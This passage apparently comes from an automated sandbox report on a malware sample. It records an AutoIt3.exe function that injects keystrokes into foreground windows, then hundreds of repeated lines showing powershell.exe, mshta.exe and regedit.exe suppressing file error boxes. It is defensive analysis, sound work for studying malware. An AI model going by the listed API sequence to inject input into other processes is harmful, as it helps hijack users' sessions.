      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_00185D03 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,15_2_00185D03
      Source: C:\Windows\regedit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
